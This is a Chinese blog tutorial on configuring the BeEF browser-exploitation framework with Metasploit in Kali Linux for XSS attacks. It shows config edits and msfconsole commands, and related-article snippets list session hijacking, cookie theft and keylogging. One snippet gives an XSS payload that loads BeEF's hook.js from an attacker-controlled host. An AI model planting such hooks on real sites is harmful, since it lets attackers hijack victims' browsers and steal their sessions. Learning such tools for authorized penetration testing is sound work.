xss利用之kali神器beef

最新推荐文章于 2025-07-18 14:35:32 发布
最新推荐文章于 2025-07-18 14:35:32 发布
阅读量3.2w 收藏 28
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 科研项目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jiangliuzheng/article/details/51910687
本文介绍了如何在Kali Linux中配置BeEF,并将其与Metasploit关联,以进行XSS利用。首先,需要修改config.yaml文件进行配置。接着,启动Metasploit服务。然后运行BeEF.rb脚本,确保不关闭终端以免登录失败。最后,通过默认用户名和密码beef登录BeEF的主界面,准备进行XSS攻击。文中还给出了一个内部测试的XSS网站例子。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、beef基本配置

BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf

1、修改config.yaml

编辑
/usr/share/beef-xss/config.yaml

metasploit:
            enable: false改为true

这里写图片描述

编辑
/usr/share/beef-xss/extensions/demos/config.yaml

enable:true改为false

编辑
/usr/share/beef-xss/extensions/metasploit/config.yaml

设置
    ssl: true
    ssl_version: 'TLSv1'

这里写图片描述

2、启动msf服务

service postgresql start
service metasploit start
msfconsole
load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 SSL=y

3、运行BeEF.rb

最低0.47元/天 解锁文章

200万优质内容无限畅学
网安工具系列:kalibeef的基础使用
weixin_54626591的博客
04-07 1261
kalibeef的基础使用
kali安装beef
11-29 7618
kali安装beef 本站所有文章均为原创,欢迎转载,请注明文章出处:https://blog.youkuaiyun.com/weixin_43847838/article/details/110312851。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
通过kali安装和打开beef-xss神器
最新发布
刚学习web安全请多指教
07-18 318
本文介绍了在Kali Linux中安装和使用Beef-XSS工具的步骤:首先通过终端执行sudo apt update更新软件包索引,然后使用sudo apt install beef-xss命令安装工具。安装完成后,通过sudo beef-xss命令启动工具,首次运行需要设置密码,且密码不能为"beef"。该工具主要用于XSS漏洞测试和安全研究。
beef-xss安装与使用
Bu2n的博客
12-07 3759
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
kali工具之Beef
wulanlin的博客
12-27 605
*本工具仅供技术分享、交流讨论,严禁用于非法用途。 简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4.会话劫持 5.键盘记录 6.插件信息 持久化控制: 1.确认弹框 2.小窗口 3.中间人 社会工程: 1
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4948
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
渗透测试之XSS(跨站脚本攻击)
Hi~ 土拨鼠
12-14 3557
文章目录XSS 漏洞概述XSS 分类XSS 危害XSS 漏洞的验证 XSS 漏洞概述 XSS是OWASP TOP 10 之一。 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS 可以非常灵活的操作html、css和浏览器,这使得XSS攻击的“想象"空间特别大。 XSS通过将精心构造的
XSS漏洞概述及使用
一颗小松子.的博客
01-23 1697
XSS 漏洞概述 简介 XSS作为OWASP TOP 10 之一 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名, 所以更名为XSSXSS(跨站脚本攻击) 主要基于javascript (JS) 完成恶意的攻击行为。 JS可以非常灵活的操作html,css和浏览器,这使得XSS攻击的"想象"空间特别大。 XSS通过将精心构造的代码(JS)代码注入到网页中,并由浏览器解释运
渗透测试工具包 | 开源安全测试工具 | 网络安全工具
成功路上的奋青者
10-18 2015
x-crack - x-crack - 弱密码扫描器,支持:FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB。nishang - Nishang - 用于红队、渗透测试和进攻性安全的进攻性 PowerShell,内网信息收集,横向,扫描、获取凭证等ps脚本。commix - web向命令注入检测工具,自动化的一体化操作系统命令注入利用工具,可自动检测和利用命令注入漏洞。用于测试 WordPress 网站的安全性。
kali,beef-xss安装及使用
m0_73581247的博客
06-22 2546
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
KaliBeef的使用教程
weixin_43287317的博客
04-02 5570
KaliBeef的使用教程
XSS另类攻击(四)kali系统beef-xss安装和使用
06-01 1830
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
Kali [BeEF-XSS]XSS利用工具
weixin_45253622的博客
03-29 4539
BeEF-XSS的使用 BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 安装 linux安装 apt-get update apt-get install beef-xss 启动Apache并打开beef service apache2 start beef-xss #打开 打开beef需要设置密码,默认密码和用户名都为beef 第二个框是示例payloa
kalibeef的安装
hjhwdwdw的博客
12-23 1042
接着输入beef-xss打开beef,会让你输入新的密码,账号密码初始默认都为beef(输入密码的时候不可见)安装beef输入以下命令。修改密码后会自动登录。
kalibeef的使用
热门推荐
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali下使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
kali beef的使用
pigzlfa的博客
07-05 497
beef的安装 可以直接安装也可以从源码安装,略 beef安装好后,打开web登陆页面 http://192.168.102.130:3000/ui/panel url为kali机地址,可以从配置文件中修改 3.把js加载进存在xss的地方(例pikachu) payload: <script src='http://192.168.102.130:3000/hook.js'></script> 可以看到在不停的向102.130发起请求 使用beef中终端发送弹窗 .
kali beef-xss active:failed
03-21
好的,我现在需要解决用户提到的在Kali Linux中BeEF-XSS服务启动失败的问题。首先,我应该回忆一下常见的BeEF服务启动失败的可能原因,然后逐步检查每个可能性。用户提到错误状态是active: failed,所以首先要查看...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值